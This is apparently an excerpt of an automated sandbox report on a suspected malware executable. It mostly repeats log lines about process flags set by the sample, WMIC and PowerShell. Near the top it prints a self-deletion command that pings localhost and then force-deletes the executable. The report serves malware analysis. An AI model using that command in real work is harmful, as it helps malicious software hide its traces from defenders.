                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Self deletion via cmd or bat file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
